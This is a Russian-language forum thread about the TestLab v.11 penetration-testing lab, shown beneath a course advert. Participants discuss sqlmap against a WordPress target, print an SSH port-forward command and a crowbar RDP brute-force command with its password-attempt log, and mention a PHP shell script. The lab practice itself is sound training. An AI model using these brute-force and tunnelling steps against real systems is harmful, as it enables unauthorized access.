• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Лаборатория тестирования на проникновения "TestLab v.11" WhoIs Mr.Hacker (1)

I

[ixTor]

кто парсил таблы в бд на вордпресе? никак немогу нормально скульмап настроить , подскажите что не так (LVL SITE)
постоянно предлагает подбирать по словарю, do you want to use common table existence check? [y/N/q] . я же знаю как запрос настроить что бы выбирать лимитом по одному , но незнаю как этот запрос всунуть в скульмап

LVL RDP
пробросил порт по SSH <Shift+~+C> -L 3389:192.168.13.1:3389
вобщем чет теперь сбрутить немогу, бручу crowbar'ом/
кто ни будь уже подобрал пароль?
[doublepost=1508044704,1507956987][/doublepost]блин че никто кроме меня не проходит эту лабу тут?
 
P

Pavke

Там брутитсч на раз, возможно, просто словарь пользуешь не тот. Я стандартный от джона брал.
 
I

[ixTor]

брутил брутил несбрутил, взял пароль посотрел и как оказалось он был в словарях а у меня неподбрутилось, может я неправильно поставил?

контачусь к SSH пробрасываю порт даю команду у себя на компе
ixtor@pc:~/lab/ssh$ sudo ssh -i ssh.key tech@192.168.101.11 -p2222 -L 3389:192.168.13.1:3389
Нажмите, чтобы раскрыть...
потом

ixtor@pc:~/lab/tools/crowbar$ sudo python crowbar.py -b rdp -u arm554 -C /usr/share/john/password.lst -s 127.0.0.1/32 -v
Нажмите, чтобы раскрыть...
и нехрена.

токен я уже взял но обидно что сам не сбрутил, два дня мучался

2017-10-15 17:34:35 LOG-RDP: 127.0.0.1:3389 - arm554:fuckme
2017-10-15 17:34:35 LOG-RDP: 127.0.0.1:3389 - arm554:fuckyou
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:matthew
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:miller
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:tiger
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:trustno1
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:alex
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:apple
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:avalon
2017-10-15 17:34:36 LOG-RDP: 127.0.0.1:3389 - arm554:brandy
2017-10-15 17:34:37 LOG-RDP: 127.0.0.1:3389 - arm554:chelsea
2017-10-15 17:34:37 LOG-RDP: 127.0.0.1:3389 - arm554:coffee

и вот так все время
 
id2746

id2746

Green Team
12.11.2016
435
644
BIT
14
Не пойму один момент при взятии первого токена.
Использовал php скрипт предложенный @~~DarkNode~~. Так вот пока не закомментировал строку с пассвордом админа, не мог никак получить шелл..
До этого и по дефлоту пробовал, и пасс менял - никак.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ